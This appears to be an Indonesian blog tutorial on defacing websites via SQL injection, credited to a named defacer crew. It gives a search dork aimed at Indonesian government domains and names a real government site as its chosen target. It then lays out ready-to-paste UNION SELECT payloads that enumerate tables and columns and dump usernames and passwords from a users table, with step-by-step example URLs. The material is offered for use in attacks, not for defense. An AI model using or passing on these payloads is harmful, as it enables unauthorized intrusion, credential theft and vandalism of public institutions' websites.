Deface poc sql injection


   
               Tutorial Deface Sql injection




Pada tutorial ini saya akan menggunakan android,agak sedikit beda dengan exploit lain exploit kali ini di buat oleh Seorang defacer Bernickname Badut Galau dari team Cowok Tersakiti Team.

Pada dasarnya SQLI ada teknik deface yang sudah cukup lama,namun karna masih banyak situs pemerintahan indonesian yang terkena celah tersebut jadi we akan share tutorial nya.

Sebelum ke tutorialnya mari kita bahas apa itu deface.
Deface yang berdasarkan kamus UMUM berarti merusakkan; mencemarkan; menggoresi; menghapuskan tetapi arti kata deface disini yang sangat lekat adalah sebagai salah satu kegiatan merubah tampilan suatu website baik halaman utama atau index filenya ataupun halaman lain yang masih terkait dalam satu url dengan website tersebut (bisa di folder atau di file).
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname mereka agar hasil kerjanya diketahui oleh khalayak hacker.
Pelaku peretasan deface sendiri dikenal dengan sebutan Defacer.




Persiapan Deface ;
Dork : inurl:news.php?id= site:.go.id
         (Site:.go.id bisa diganti contoh site:.in)
Exploit : concat(0x496e6a6563742062792062616475742067616c6175,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
Exploit Dump : (select(@x)from(select(@x:=0x00),(select(@x)from(yang mau d buka)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,isi,0x203a3a20,isi))))x)


Langkah-langkah Deface ;
dorking ke google mengunakan dork yang sudah saya siapkan



  • Setelah selesai dorking silahkan pilih web sesuka kalian,jika tidak vuln cari web laen.(kali ini saya akan menggunakan web www.rajaampatkab.go.id)
  • Untuk mencari tau vulnnya bisa di tambahkan kode berikut: (')(")(*)(.)
  • Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip,bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali
  • Contoh

    http://site.com/berita.php?id=205%27+order+by+1--+- Normal

    http://site.com/berita.php?id=205%27+order+by+2--+- Normal

     http://site.com/berita.php?id=205%27+order+by+3--+- Normal

    http://site.com/berita.php?id=205%27+order+by+13--+- Normal

    http://site.com/berita.php?id=205%27+order+by+14--+- Error
    Berarti jumlah kolom pada database nya ada 13 kolom 
    • Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya.
    • Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – di depan angka.
    Contoh
    http://site.com/berita.php?id=-205%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+-
    Nanti akan ada angka ajaibnya(angka ajaib saya yaitu 2,4,7, dan 12).

    • Di langkah ini lah yang akan menentukan sukses atau ngak nya SQLi kita pada kali ini,untuk cara pemasangan exploit bisa di ikut contoh di bawah ini.
    http://site.com/berita.php?id=-205'union+select+1,2,3,concat(0x496e6a6563742062792062616475742067616c6175,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),5,6,7,8,9,10,11,12,13--+-

    Pemasangan exploit di letakan di letak angka ajaib yang kita temukan(saya memasang di angka 4).


    • Disini kita akan menemukan Username dan password dari situs yang ingin kita deface,kali ini saya akan DUMP menggunakan DUMP yg sudah saya berikan.



Sebagai contoh ;

 http://site.com/berita.php?id=-205%27+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(@x)from(users)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),5,6,7,8,9,10,11,12,13--+

Oke sekian terimakasih 

Belum ada Komentar untuk "Deface poc sql injection "

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel